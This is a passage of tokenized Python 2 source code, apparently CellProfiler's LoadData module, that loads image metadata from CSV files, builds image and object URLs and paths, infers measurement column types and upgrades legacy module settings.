Fit ( ) <EOL> frame . Show ( ) <EOL> def get_header ( self , do_not_cache = False ) : <EOL> '''<STR_LIT>''' <EOL> entry = self . get_cache_info ( ) <EOL> if entry . has_key ( "<STR_LIT>" ) : <EOL> return entry [ "<STR_LIT>" ] <EOL> fd = self . open_csv ( do_not_cache = do_not_cache ) <EOL> reader = csv . reader ( fd ) <EOL> header = reader . next ( ) <EOL> fd . close ( ) <EOL> if header [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) : <EOL> try : <EOL> data = self . convert ( ) <EOL> except Exception , e : <EOL> raise RuntimeError ( "<STR_LIT:%s>" % e ) <EOL> header = data . dtype . names <EOL> entry [ "<STR_LIT>" ] = [ header_to_column ( column ) for column in header ] <EOL> return entry [ "<STR_LIT>" ] <EOL> def get_image_names ( self , do_not_cache = False ) : <EOL> header = self . 
get_header ( do_not_cache = do_not_cache ) <EOL> image_names = set ( [ <EOL> get_image_name ( field ) <EOL> for field in header <EOL> if is_file_name_feature ( field ) or is_url_name_feature ( field ) ] ) <EOL> return list ( image_names ) <EOL> def get_object_names ( self , do_not_cache = False ) : <EOL> header = self . get_header ( do_not_cache = do_not_cache ) <EOL> object_names = set ( [ get_objects_name ( field ) <EOL> for field in header <EOL> if is_objects_file_name_feature ( field ) or <EOL> is_objects_url_name_feature ( field ) ] ) <EOL> return list ( object_names ) <EOL> def other_providers ( self , group ) : <EOL> '''<STR_LIT>''' <EOL> if group == '<STR_LIT>' and self . wants_images . value : <EOL> try : <EOL> return self . get_image_names ( do_not_cache = True ) <EOL> except Exception , e : <EOL> return [ ] <EOL> elif group == '<STR_LIT>' and self . wants_images : <EOL> try : <EOL> return self . get_object_names ( do_not_cache = True ) <EOL> except Exception , e : <EOL> return [ ] <EOL> return [ ] <EOL> def is_image_from_file ( self , image_name ) : <EOL> '''<STR_LIT>''' <EOL> providers = self . other_providers ( '<STR_LIT>' ) <EOL> return image_name in providers <EOL> def is_load_module ( self ) : <EOL> '''<STR_LIT>''' <EOL> return True <EOL> def prepare_run ( self , workspace ) : <EOL> pipeline = workspace . pipeline <EOL> m = workspace . measurements <EOL> assert isinstance ( m , cpmeas . Measurements ) <EOL> '''<STR_LIT>''' <EOL> if pipeline . in_batch_mode ( ) : <EOL> return True <EOL> fd = self . open_csv ( ) <EOL> reader = csv . reader ( fd ) <EOL> header = [ header_to_column ( column ) for column in reader . next ( ) ] <EOL> if header [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) : <EOL> reader = self . convert ( ) <EOL> header = list ( reader . dtype . names ) <EOL> if self . wants_rows . value : <EOL> rows = [ ] <EOL> for idx , row in enumerate ( reader ) : <EOL> if idx + <NUM_LIT:1> < self . row_range . 
min : <EOL> continue <EOL> if idx + <NUM_LIT:1> > self . row_range . max : <EOL> break <EOL> if len ( row ) == <NUM_LIT:0> : <EOL> continue <EOL> row = [ unicode ( s , '<STR_LIT:utf8>' ) if isinstance ( s , str ) else s <EOL> for s in row ] <EOL> if len ( row ) != len ( header ) : <EOL> raise ValueError ( "<STR_LIT>" % <EOL> ( i , len ( row ) , len ( header ) ) ) <EOL> rows . append ( row ) <EOL> else : <EOL> rows = [ [ unicode ( s , '<STR_LIT:utf8>' ) if isinstance ( s , str ) else s <EOL> for s in row ] for row in reader <EOL> if len ( row ) > <NUM_LIT:0> ] <EOL> fd . close ( ) <EOL> n_fields = len ( header ) <EOL> for i , row in enumerate ( rows ) : <EOL> if len ( row ) < n_fields : <EOL> text = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) % ( <EOL> i + <NUM_LIT:2> , self . csv_file_name . value , <EOL> '<STR_LIT:U+002C>' . join ( row ) , <EOL> len ( row ) , n_fields ) <EOL> raise ValueError ( text ) <EOL> elif len ( row ) > n_fields : <EOL> del row [ n_fields : ] <EOL> metadata_columns = { } <EOL> object_columns = { } <EOL> image_columns = { } <EOL> well_row_column = well_column_column = well_well_column = None <EOL> for i , column in enumerate ( header ) : <EOL> if column . find ( "<STR_LIT:_>" ) == - <NUM_LIT:1> : <EOL> category = "<STR_LIT>" <EOL> feature = column <EOL> else : <EOL> category , feature = column . split ( "<STR_LIT:_>" , <NUM_LIT:1> ) <EOL> if category in IMAGE_CATEGORIES : <EOL> if not image_columns . has_key ( feature ) : <EOL> image_columns [ feature ] = [ ] <EOL> image_columns [ feature ] . append ( i ) <EOL> elif category in OBJECTS_CATEGORIES : <EOL> if not object_columns . has_key ( feature ) : <EOL> object_columns [ feature ] = [ ] <EOL> object_columns [ feature ] . append ( i ) <EOL> else : <EOL> metadata_columns [ column ] = i <EOL> if category == cpmeas . C_METADATA : <EOL> if feature . lower ( ) == cpmeas . FTR_WELL . lower ( ) : <EOL> well_well_column = i <EOL> elif cpmeas . 
is_well_row_token ( feature ) : <EOL> well_row_column = i <EOL> elif cpmeas . is_well_column_token ( feature ) : <EOL> well_column_column = i <EOL> if ( well_row_column is not None and well_column_column is not None and <EOL> well_well_column is None ) : <EOL> metadata_columns [ cpmeas . M_WELL ] = len ( header ) <EOL> header . append ( cpmeas . M_WELL ) <EOL> for row in rows : <EOL> row . append ( row [ well_row_column ] + row [ well_column_column ] ) <EOL> if self . wants_images : <EOL> if self . image_directory . dir_choice == cps . NO_FOLDER_NAME : <EOL> path_base = "<STR_LIT>" <EOL> else : <EOL> path_base = self . image_path <EOL> for d , url_category , file_name_category , path_name_category in ( <EOL> ( image_columns , C_URL , C_FILE_NAME , C_PATH_NAME ) , <EOL> ( object_columns , C_OBJECTS_URL , C_OBJECTS_FILE_NAME , <EOL> C_OBJECTS_PATH_NAME ) ) : <EOL> for name in d . keys ( ) : <EOL> url_column = file_name_column = path_name_column = None <EOL> for k in d [ name ] : <EOL> if header [ k ] . startswith ( url_category ) : <EOL> url_column = k <EOL> elif header [ k ] . startswith ( file_name_category ) : <EOL> file_name_column = k <EOL> elif header [ k ] . startswith ( path_name_category ) : <EOL> path_name_column = k <EOL> if url_column is None : <EOL> if file_name_column is None : <EOL> raise ValueError ( <EOL> ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % ( file_name_category , name , <EOL> path_name_category , name ) ) <EOL> d [ name ] . append ( len ( header ) ) <EOL> url_feature = "<STR_LIT:_>" . join ( ( url_category , name ) ) <EOL> header . append ( url_feature ) <EOL> for row in rows : <EOL> if path_name_column is None : <EOL> fullname = os . path . join ( path_base , <EOL> row [ file_name_column ] ) <EOL> else : <EOL> row_path_name = os . path . join ( <EOL> path_base , row [ path_name_column ] ) <EOL> fullname = os . path . 
join ( <EOL> row_path_name , row [ file_name_column ] ) <EOL> row [ path_name_column ] = row_path_name <EOL> url = pathname2url ( fullname ) <EOL> row . append ( url ) <EOL> if path_name_column is None : <EOL> d [ name ] . append ( len ( header ) ) <EOL> path_feature = "<STR_LIT:_>" . join ( ( path_name_category , name ) ) <EOL> header . append ( path_feature ) <EOL> for row in rows : <EOL> row . append ( path_base ) <EOL> elif path_name_column is None and file_name_column is None : <EOL> path_feature = "<STR_LIT:_>" . join ( ( path_name_category , name ) ) <EOL> path_name_column = len ( header ) <EOL> header . append ( path_feature ) <EOL> file_name_feature = "<STR_LIT:_>" . join ( ( file_name_category , name ) ) <EOL> file_name_column = len ( header ) <EOL> header . append ( file_name_feature ) <EOL> for row in rows : <EOL> url = row [ url_column ] <EOL> idx = url . rfind ( "<STR_LIT:/>" ) <EOL> if idx == - <NUM_LIT:1> : <EOL> idx = url . rfind ( "<STR_LIT::>" ) <EOL> if idx == - <NUM_LIT:1> : <EOL> row += [ "<STR_LIT>" , url ] <EOL> else : <EOL> row += [ url [ : ( idx + <NUM_LIT:1> ) ] , url [ ( idx + <NUM_LIT:1> ) : ] ] <EOL> else : <EOL> row += [ url [ : idx ] , url [ ( idx + <NUM_LIT:1> ) : ] ] <EOL> column_type = { } <EOL> for column in self . get_measurement_columns ( pipeline ) : <EOL> column_type [ column [ <NUM_LIT:1> ] ] = column [ <NUM_LIT:2> ] <EOL> previous_column_types = dict ( [ <EOL> ( c [ <NUM_LIT:1> ] , c [ <NUM_LIT:2> ] ) for c in pipeline . get_measurement_columns ( self ) <EOL> if c [ <NUM_LIT:0> ] == cpmeas . IMAGE ] ) <EOL> columns = { } <EOL> for index , feature in enumerate ( header ) : <EOL> c = [ ] <EOL> columns [ feature ] = c <EOL> for row in rows : <EOL> value = row [ index ] <EOL> if column_type . has_key ( feature ) : <EOL> datatype = column_type [ feature ] <EOL> else : <EOL> datatype = previous_column_types [ feature ] <EOL> if datatype == cpmeas . COLTYPE_INTEGER : <EOL> value = int ( value ) <EOL> elif datatype == cpmeas . 
COLTYPE_FLOAT : <EOL> value = float ( value ) <EOL> c . append ( value ) <EOL> if len ( metadata_columns ) > <NUM_LIT:0> : <EOL> image_numbers = m . match_metadata ( <EOL> metadata_columns . keys ( ) , <EOL> [ columns [ k ] for k in metadata_columns . keys ( ) ] ) <EOL> image_numbers = np . array ( image_numbers , int ) . flatten ( ) <EOL> max_image_number = np . max ( image_numbers ) <EOL> new_columns = { } <EOL> for key , values in columns . iteritems ( ) : <EOL> new_values = [ None ] * max_image_number <EOL> for image_number , value in zip ( image_numbers , values ) : <EOL> new_values [ image_number - <NUM_LIT:1> ] = value <EOL> new_columns [ key ] = new_values <EOL> columns = new_columns <EOL> for feature , values in columns . iteritems ( ) : <EOL> m . add_all_measurements ( cpmeas . IMAGE , feature , values ) <EOL> if self . wants_image_groupings and len ( self . metadata_fields . selections ) > <NUM_LIT:0> : <EOL> keys = [ "<STR_LIT:_>" . join ( ( cpmeas . C_METADATA , k ) ) <EOL> for k in self . metadata_fields . selections ] <EOL> m . set_grouping_tags ( keys ) <EOL> return True <EOL> def prepare_to_create_batch ( self , workspace , fn_alter_path ) : <EOL> '''<STR_LIT>''' <EOL> if self . wants_images : <EOL> m = workspace . measurements <EOL> assert isinstance ( m , cpmeas . Measurements ) <EOL> image_numbers = m . get_image_numbers ( ) <EOL> all_image_features = m . get_feature_names ( cpmeas . IMAGE ) <EOL> for url_category , file_category , path_category , names in ( <EOL> ( C_URL , C_FILE_NAME , C_PATH_NAME , self . get_image_names ( ) ) , <EOL> ( C_OBJECTS_URL , C_OBJECTS_FILE_NAME , C_OBJECTS_PATH_NAME , <EOL> self . get_object_names ( ) ) ) : <EOL> for name in names : <EOL> url_feature = "<STR_LIT:_>" . join ( ( url_category , name ) ) <EOL> path_feature = "<STR_LIT:_>" . join ( ( path_category , name ) ) <EOL> if path_feature not in all_image_features : <EOL> path_feature = None <EOL> file_feature = "<STR_LIT:_>" . 
join ( ( file_category , name ) ) <EOL> if file_feature not in all_image_features : <EOL> file_feature = None <EOL> urls = m . get_measurement ( cpmeas . IMAGE , <EOL> url_feature , <EOL> image_set_number = image_numbers ) <EOL> for image_number , url in zip ( image_numbers , urls ) : <EOL> url = url . encode ( "<STR_LIT:utf-8>" ) <EOL> if url . lower ( ) . startswith ( "<STR_LIT>" ) : <EOL> fullname = url2pathname ( url ) <EOL> fullname = fn_alter_path ( fullname ) <EOL> path , filename = os . path . split ( fullname ) <EOL> url = unicode ( pathname2url ( fullname ) , "<STR_LIT:utf-8>" ) <EOL> m . add_measurement ( cpmeas . IMAGE , url_feature , url , <EOL> image_set_number = image_number ) <EOL> if file_feature is not None : <EOL> m . add_measurement ( <EOL> cpmeas . IMAGE , file_feature , <EOL> filename , <EOL> image_set_number = image_number ) <EOL> if path_feature is not None : <EOL> m . add_measurement ( <EOL> cpmeas . IMAGE , path_feature , <EOL> path , image_set_number = image_number ) <EOL> self . csv_directory . alter_for_create_batch_files ( fn_alter_path ) <EOL> self . image_directory . alter_for_create_batch_files ( fn_alter_path ) <EOL> return True <EOL> def fetch_provider ( self , name , measurements , is_image_name = True ) : <EOL> path_base = self . image_path <EOL> if is_image_name : <EOL> url_feature = C_URL + "<STR_LIT:_>" + name <EOL> series_feature = C_SERIES + "<STR_LIT:_>" + name <EOL> frame_feature = C_FRAME + "<STR_LIT:_>" + name <EOL> else : <EOL> url_feature = C_OBJECTS_URL + "<STR_LIT:_>" + name <EOL> series_feature = C_OBJECTS_SERIES + "<STR_LIT:_>" + name <EOL> frame_feature = C_OBJECTS_FRAME + "<STR_LIT:_>" + name <EOL> url = measurements . get_measurement ( cpmeas . IMAGE , url_feature ) <EOL> url = url . encode ( '<STR_LIT:utf-8>' ) <EOL> full_filename = url2pathname ( url ) <EOL> path , filename = os . path . split ( full_filename ) <EOL> if measurements . has_feature ( cpmeas . 
IMAGE , series_feature ) : <EOL> series = measurements [ cpmeas . IMAGE , series_feature ] <EOL> else : <EOL> series = None <EOL> if measurements . has_feature ( cpmeas . IMAGE , frame_feature ) : <EOL> frame = measurements [ cpmeas . IMAGE , frame_feature ] <EOL> else : <EOL> frame = None <EOL> return LoadImagesImageProvider ( <EOL> name , path , filename , <EOL> rescale = self . rescale . value and is_image_name , <EOL> series = series , <EOL> index = frame ) <EOL> def run ( self , workspace ) : <EOL> '''<STR_LIT>''' <EOL> m = workspace . measurements <EOL> assert isinstance ( m , cpmeas . Measurements ) <EOL> image_set = workspace . image_set <EOL> object_set = workspace . object_set <EOL> statistics = [ ] <EOL> features = [ x [ <NUM_LIT:1> ] for x in <EOL> self . get_measurement_columns ( workspace . pipeline ) <EOL> if x [ <NUM_LIT:0> ] == cpmeas . IMAGE ] <EOL> if self . wants_images : <EOL> image_size = None <EOL> for image_name in self . other_providers ( '<STR_LIT>' ) : <EOL> provider = self . fetch_provider ( image_name , m ) <EOL> image_set . get_providers ( ) . append ( provider ) <EOL> image = image_set . get_image ( image_name ) <EOL> pixel_data = image . pixel_data <EOL> m . add_image_measurement ( "<STR_LIT:_>" . join ( ( C_MD5_DIGEST , image_name ) ) , <EOL> provider . get_md5_hash ( m ) ) <EOL> m . add_image_measurement ( "<STR_LIT:_>" . join ( ( C_SCALING , image_name ) ) , <EOL> image . scale ) <EOL> m . add_image_measurement ( "<STR_LIT:_>" . join ( ( C_HEIGHT , image_name ) ) , <EOL> int ( pixel_data . shape [ <NUM_LIT:0> ] ) ) <EOL> m . add_image_measurement ( "<STR_LIT:_>" . join ( ( C_WIDTH , image_name ) ) , <EOL> int ( pixel_data . shape [ <NUM_LIT:1> ] ) ) <EOL> if image_size is None : <EOL> image_size = tuple ( pixel_data . shape [ : <NUM_LIT:2> ] ) <EOL> first_filename = image . file_name <EOL> elif tuple ( pixel_data . 
shape [ : <NUM_LIT:2> ] ) != image_size : <EOL> warning = bad_sizes_warning ( image_size , first_filename , <EOL> pixel_data . shape , image . file_name ) <EOL> if self . show_window : <EOL> workspace . display_data . warning = warning <EOL> else : <EOL> print warning <EOL> objects_names = self . get_object_names ( ) <EOL> for objects_name in objects_names : <EOL> provider = self . fetch_provider ( <EOL> objects_name , m , is_image_name = False ) <EOL> image = provider . provide_image ( workspace . image_set ) <EOL> pixel_data = convert_image_to_objects ( image . pixel_data ) <EOL> o = cpo . Objects ( ) <EOL> o . segmented = pixel_data <EOL> object_set . add_objects ( o , objects_name ) <EOL> I . add_object_count_measurements ( m , objects_name , o . count ) <EOL> I . add_object_location_measurements ( m , objects_name , pixel_data ) <EOL> for feature_name in sorted ( features ) : <EOL> value = m . get_measurement ( cpmeas . IMAGE , feature_name ) <EOL> statistics . append ( ( feature_name , value ) ) <EOL> if self . show_window : <EOL> workspace . display_data . statistics = statistics <EOL> def display ( self , workspace , figure ) : <EOL> if hasattr ( workspace . display_data , "<STR_LIT>" ) : <EOL> from cellprofiler . gui . errordialog import show_warning <EOL> show_warning ( "<STR_LIT>" , <EOL> workspace . display_data . warning , <EOL> cpprefs . get_show_report_bad_sizes_dlg , <EOL> cpprefs . set_show_report_bad_sizes_dlg ) <EOL> figure . set_subplots ( ( <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> figure . subplot_table ( <NUM_LIT:0> , <NUM_LIT:0> , workspace . display_data . statistics ) <EOL> def get_groupings ( self , workspace ) : <EOL> '''<STR_LIT>''' <EOL> if ( self . wants_images . value and <EOL> self . wants_image_groupings . value and <EOL> len ( self . metadata_fields . selections ) > <NUM_LIT:0> ) : <EOL> keys = [ "<STR_LIT:_>" . join ( ( cpmeas . C_METADATA , k ) ) <EOL> for k in self . metadata_fields . 
selections ] <EOL> if len ( keys ) == <NUM_LIT:0> : <EOL> return None <EOL> m = workspace . measurements <EOL> assert isinstance ( m , cpmeas . Measurements ) <EOL> return keys , m . get_groupings ( keys ) <EOL> return None <EOL> def get_measurement_columns ( self , pipeline ) : <EOL> '''<STR_LIT>''' <EOL> entry = None <EOL> try : <EOL> entry = self . get_cache_info ( ) <EOL> if entry . has_key ( "<STR_LIT>" ) : <EOL> return entry [ "<STR_LIT>" ] <EOL> fd = self . open_csv ( ) <EOL> reader = csv . reader ( fd ) <EOL> header = [ header_to_column ( x ) for x in reader . next ( ) ] <EOL> if header [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) : <EOL> reader = self . convert ( ) <EOL> header = reader . dtype . names <EOL> except : <EOL> if entry is not None : <EOL> entry [ "<STR_LIT>" ] = [ ] <EOL> return [ ] <EOL> previous_columns = pipeline . get_measurement_columns ( self ) <EOL> previous_fields = set ( [ x [ <NUM_LIT:1> ] for x in previous_columns <EOL> if x [ <NUM_LIT:0> ] == cpmeas . IMAGE ] ) <EOL> already_output = [ x in previous_fields for x in header ] <EOL> coltypes = [ cpmeas . COLTYPE_INTEGER ] * len ( header ) <EOL> for i in range ( len ( header ) ) : <EOL> if ( header [ i ] . startswith ( cpmeas . C_METADATA + "<STR_LIT:_>" ) and <EOL> cpmeas . is_well_column_token ( header [ i ] . split ( "<STR_LIT:_>" ) [ <NUM_LIT:1> ] ) ) : <EOL> coltypes [ i ] = cpmeas . COLTYPE_VARCHAR <EOL> if any ( [ header [ i ] . startswith ( x ) <EOL> for x in ( C_PATH_NAME , C_FILE_NAME , C_OBJECTS_FILE_NAME , <EOL> C_OBJECTS_PATH_NAME , C_URL , C_OBJECTS_URL ) ] ) : <EOL> coltypes [ i ] = cpmeas . COLTYPE_VARCHAR <EOL> collen = [ <NUM_LIT:0> ] * len ( header ) <EOL> key_is_path_or_file_name = [ <EOL> ( key . startswith ( C_PATH_NAME ) or <EOL> key . startswith ( C_FILE_NAME ) or <EOL> key . startswith ( C_OBJECTS_FILE_NAME ) or <EOL> key . startswith ( C_OBJECTS_PATH_NAME ) ) for key in header ] <EOL> key_is_path_or_url = [ <EOL> ( key . 
startswith ( C_PATH_NAME ) or <EOL> key . startswith ( C_OBJECTS_PATH_NAME ) or <EOL> key . startswith ( C_URL ) or <EOL> key . startswith ( C_OBJECTS_URL ) ) for key in header ] <EOL> for row in reader : <EOL> if len ( row ) > len ( header ) : <EOL> row = row [ : len ( header ) ] <EOL> for index , field in enumerate ( row ) : <EOL> if already_output [ index ] : <EOL> continue <EOL> if ( not self . wants_images ) and key_is_path_or_file_name [ index ] : <EOL> continue <EOL> try : <EOL> len_field = len ( field ) <EOL> except TypeError : <EOL> field = str ( field ) <EOL> len_field = len ( field ) <EOL> if key_is_path_or_url [ index ] : <EOL> len_field = max ( cpmeas . PATH_NAME_LENGTH , <EOL> len_field + PATH_PADDING ) <EOL> if coltypes [ index ] != cpmeas . COLTYPE_VARCHAR : <EOL> ldtype = get_loaddata_type ( field ) <EOL> if coltypes [ index ] == cpmeas . COLTYPE_INTEGER : <EOL> coltypes [ index ] = ldtype <EOL> elif ( coltypes [ index ] == cpmeas . COLTYPE_FLOAT and <EOL> ldtype != cpmeas . COLTYPE_INTEGER ) : <EOL> coltypes [ index ] = ldtype <EOL> if collen [ index ] < len ( field ) : <EOL> collen [ index ] = len ( field ) <EOL> for index in range ( len ( header ) ) : <EOL> if coltypes [ index ] == cpmeas . COLTYPE_VARCHAR : <EOL> coltypes [ index ] = cpmeas . COLTYPE_VARCHAR_FORMAT % collen [ index ] <EOL> image_names = self . other_providers ( '<STR_LIT>' ) <EOL> result = [ ( cpmeas . IMAGE , colname , coltype ) <EOL> for colname , coltype in zip ( header , coltypes ) <EOL> if colname not in previous_fields ] <EOL> if self . wants_images : <EOL> for feature , coltype in ( <EOL> ( C_URL , cpmeas . COLTYPE_VARCHAR_PATH_NAME ) , <EOL> ( C_PATH_NAME , cpmeas . COLTYPE_VARCHAR_PATH_NAME ) , <EOL> ( C_FILE_NAME , cpmeas . COLTYPE_VARCHAR_FILE_NAME ) , <EOL> ( C_MD5_DIGEST , cpmeas . COLTYPE_VARCHAR_FORMAT % <NUM_LIT:32> ) , <EOL> ( C_SCALING , cpmeas . COLTYPE_FLOAT ) , <EOL> ( C_HEIGHT , cpmeas . COLTYPE_INTEGER ) , <EOL> ( C_WIDTH , cpmeas . 
COLTYPE_INTEGER ) ) : <EOL> for image_name in image_names : <EOL> measurement = feature + '<STR_LIT:_>' + image_name <EOL> if not any ( [ measurement == c [ <NUM_LIT:1> ] for c in result ] ) : <EOL> result . append ( ( cpmeas . IMAGE , measurement , coltype ) ) <EOL> for object_name in self . get_object_names ( ) : <EOL> result += I . get_object_measurement_columns ( object_name ) <EOL> for feature , coltype in ( <EOL> ( C_OBJECTS_URL , cpmeas . COLTYPE_VARCHAR_PATH_NAME ) , <EOL> ( C_OBJECTS_PATH_NAME , cpmeas . COLTYPE_VARCHAR_PATH_NAME ) , <EOL> ( C_OBJECTS_FILE_NAME , cpmeas . COLTYPE_VARCHAR_FILE_NAME ) ) : <EOL> mname = C_OBJECTS_URL + "<STR_LIT:_>" + object_name <EOL> result . append ( ( cpmeas . IMAGE , mname , coltype ) ) <EOL> well_column = None <EOL> well_row_column = None <EOL> well_col_column = None <EOL> for column in result : <EOL> if not column [ <NUM_LIT:1> ] . startswith ( cpmeas . C_METADATA + "<STR_LIT:_>" ) : <EOL> continue <EOL> category , feature = column [ <NUM_LIT:1> ] . split ( '<STR_LIT:_>' , <NUM_LIT:1> ) <EOL> if cpmeas . is_well_column_token ( feature ) : <EOL> well_col_column = column <EOL> elif cpmeas . is_well_row_token ( feature ) : <EOL> well_row_column = column <EOL> elif feature . lower ( ) == cpmeas . FTR_WELL . lower ( ) : <EOL> well_column = column <EOL> if ( well_column is None and well_row_column is not None and <EOL> well_col_column is not None ) : <EOL> length = cpmeas . get_length_from_varchar ( well_row_column [ <NUM_LIT:2> ] ) <EOL> length += cpmeas . get_length_from_varchar ( well_col_column [ <NUM_LIT:2> ] ) <EOL> result += [ ( cpmeas . IMAGE , <EOL> '<STR_LIT:_>' . join ( ( cpmeas . C_METADATA , cpmeas . FTR_WELL ) ) , <EOL> cpmeas . COLTYPE_VARCHAR_FORMAT % length ) ] <EOL> entry [ "<STR_LIT>" ] = result <EOL> return result <EOL> def has_synthetic_well_metadata ( self ) : <EOL> '''<STR_LIT>''' <EOL> fields = self . 
get_header ( ) <EOL> has_well_col = False <EOL> has_well_row = False <EOL> for field in fields : <EOL> if not field . startswith ( cpmeas . C_METADATA + "<STR_LIT:_>" ) : <EOL> continue <EOL> category , feature = field . split ( '<STR_LIT:_>' , <NUM_LIT:1> ) <EOL> if cpmeas . is_well_column_token ( feature ) : <EOL> has_well_col = True <EOL> elif cpmeas . is_well_row_token ( feature ) : <EOL> has_well_row = True <EOL> elif feature . lower ( ) == cpmeas . FTR_WELL . lower ( ) : <EOL> return False <EOL> return has_well_col and has_well_row <EOL> def get_categories ( self , pipeline , object_name ) : <EOL> try : <EOL> columns = self . get_measurement_columns ( pipeline ) <EOL> result = set ( [ column [ <NUM_LIT:1> ] . split ( '<STR_LIT:_>' ) [ <NUM_LIT:0> ] for column in columns <EOL> if column [ <NUM_LIT:0> ] == object_name ] ) <EOL> return list ( result ) <EOL> except : <EOL> return [ ] <EOL> def get_measurements ( self , pipeline , object_name , category ) : <EOL> columns = self . get_measurement_columns ( pipeline ) <EOL> return [ feature for c , feature in <EOL> [ column [ <NUM_LIT:1> ] . split ( '<STR_LIT:_>' , <NUM_LIT:1> ) for column in columns <EOL> if column [ <NUM_LIT:0> ] == object_name <EOL> and column [ <NUM_LIT:1> ] . startswith ( category + "<STR_LIT:_>" ) ] ] <EOL> def change_causes_prepare_run ( self , setting ) : <EOL> '''<STR_LIT>''' <EOL> if self . wants_images or setting == self . wants_images : <EOL> return True <EOL> return False <EOL> def upgrade_settings ( self , setting_values , variable_revision_number , <EOL> module_name , from_matlab ) : <EOL> DIR_DEFAULT_IMAGE = '<STR_LIT>' <EOL> DIR_DEFAULT_OUTPUT = '<STR_LIT>' <EOL> if from_matlab and variable_revision_number == <NUM_LIT:2> : <EOL> logging . 
warning ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> text_file_name = setting_values [ <NUM_LIT:0> ] <EOL> field_name = setting_values [ <NUM_LIT:1> ] <EOL> path_name = setting_values [ <NUM_LIT:2> ] <EOL> if path_name == '<STR_LIT:.>' : <EOL> path_choice = DIR_DEFAULT_IMAGE <EOL> elif path_name == '<STR_LIT:&>' : <EOL> path_choice = DIR_DEFAULT_OUTPUT <EOL> else : <EOL> path_choice = DIR_OTHER <EOL> setting_values = [ path_choice , path_name , text_file_name , <EOL> cps . NO , DIR_DEFAULT_IMAGE , '<STR_LIT:.>' , <EOL> cps . NO , "<STR_LIT>" ] <EOL> from_matlab = False <EOL> variable_revision_number = <NUM_LIT:1> <EOL> module_name = self . module_name <EOL> if ( not from_matlab ) and variable_revision_number == <NUM_LIT:1> : <EOL> setting_values = setting_values + [ cps . NO , "<STR_LIT>" ] <EOL> variable_revision_number = <NUM_LIT:2> <EOL> if variable_revision_number == <NUM_LIT:2> and ( not from_matlab ) : <EOL> if setting_values [ <NUM_LIT:0> ] . startswith ( "<STR_LIT>" ) : <EOL> setting_values = [ DIR_DEFAULT_IMAGE ] + setting_values [ <NUM_LIT:1> : ] <EOL> elif setting_values [ <NUM_LIT:0> ] . startswith ( "<STR_LIT>" ) : <EOL> setting_values = [ DIR_DEFAULT_OUTPUT ] + setting_values [ <NUM_LIT:1> : ] <EOL> if setting_values [ <NUM_LIT:4> ] . startswith ( "<STR_LIT>" ) : <EOL> setting_values = ( setting_values [ : <NUM_LIT:4> ] + [ DIR_DEFAULT_IMAGE ] + <EOL> setting_values [ <NUM_LIT:5> : ] ) <EOL> elif setting_values [ <NUM_LIT:4> ] . startswith ( "<STR_LIT>" ) : <EOL> setting_values = ( setting_values [ : <NUM_LIT:4> ] + [ DIR_DEFAULT_OUTPUT ] + <EOL> setting_values [ <NUM_LIT:5> : ] ) <EOL> variable_revision_number = <NUM_LIT:3> <EOL> if variable_revision_number == <NUM_LIT:3> and ( not from_matlab ) : <EOL> module_name = self . 
module_name <EOL> if variable_revision_number == <NUM_LIT:3> and ( not from_matlab ) : <EOL> csv_directory_choice , csv_custom_directory , csv_file_name , wants_images , image_directory_choice , image_custom_directory , wants_rows , row_range , wants_image_groupings , metadata_fields = setting_values <EOL> csv_directory = cps . DirectoryPath . static_join_string ( <EOL> csv_directory_choice , csv_custom_directory ) <EOL> image_directory = cps . DirectoryPath . static_join_string ( <EOL> image_directory_choice , image_custom_directory ) <EOL> setting_values = [ <EOL> csv_directory , csv_file_name , wants_images , <EOL> image_directory , wants_rows , row_range , wants_image_groupings , <EOL> metadata_fields ] <EOL> variable_revision_number = <NUM_LIT:4> <EOL> setting_values = list ( setting_values ) <EOL> for index in ( <NUM_LIT:0> , <NUM_LIT:3> ) : <EOL> setting_values [ index ] = cps . DirectoryPath . upgrade_setting ( <EOL> setting_values [ index ] ) <EOL> if variable_revision_number == <NUM_LIT:4> and ( not from_matlab ) : <EOL> csv_directory , csv_file_name , wants_images , image_directory , wants_rows , row_range , wants_image_groupings , metadata_fields = setting_values <EOL> dir_choice , custom_dir = cps . DirectoryPath . split_string ( csv_directory ) <EOL> if dir_choice == cps . URL_FOLDER_NAME : <EOL> csv_file_name = custom_dir + '<STR_LIT:/>' + csv_file_name <EOL> csv_directory = cps . DirectoryPath . static_join_string ( dir_choice , '<STR_LIT>' ) <EOL> setting_values = [ <EOL> csv_directory , csv_file_name , wants_images , <EOL> image_directory , wants_rows , row_range , wants_image_groupings , <EOL> metadata_fields ] <EOL> variable_revision_number = <NUM_LIT:5> <EOL> if variable_revision_number == <NUM_LIT:5> and ( not from_matlab ) : <EOL> setting_values = setting_values + [ cps . 
YES ] <EOL> variable_revision_number = <NUM_LIT:6> <EOL> return setting_values , variable_revision_number , from_matlab <EOL> LoadText = LoadData <EOL> def best_cast ( sequence , coltype = None ) : <EOL> '''<STR_LIT>''' <EOL> if ( isinstance ( coltype , ( str , unicode ) ) and <EOL> coltype . startswith ( cpmeas . COLTYPE_VARCHAR ) ) : <EOL> return np . array ( sequence ) <EOL> def fn ( x , y ) : <EOL> if cpmeas . COLTYPE_VARCHAR in ( x , y ) : <EOL> return cpmeas . COLTYPE_VARCHAR <EOL> if cpmeas . COLTYPE_FLOAT in ( x , y ) : <EOL> return cpmeas . COLTYPE_FLOAT <EOL> return cpmeas . COLTYPE_INTEGER <EOL> ldtype = reduce ( fn , [ get_loaddata_type ( x ) for x in sequence ] , <EOL> cpmeas . COLTYPE_INTEGER ) <EOL> if ldtype == cpmeas . COLTYPE_VARCHAR : <EOL> return np . array ( sequence ) <EOL> elif ldtype == cpmeas . COLTYPE_FLOAT : <EOL> return np . array ( sequence , np . float64 ) <EOL> else : <EOL> return np . array ( sequence , np . int32 ) <EOL> int32_max = np . iinfo ( np . int32 ) . max <EOL> int32_min = np . iinfo ( np . int32 ) . min <EOL> def get_loaddata_type ( x ) : <EOL> '''<STR_LIT>''' <EOL> global int32_max , int32_min <EOL> try : <EOL> iv = int ( x ) <EOL> if iv > int32_max : <EOL> return cpmeas . COLTYPE_VARCHAR <EOL> if iv < int32_min : <EOL> return cpmeas . COLTYPE_VARCHAR <EOL> return cpmeas . 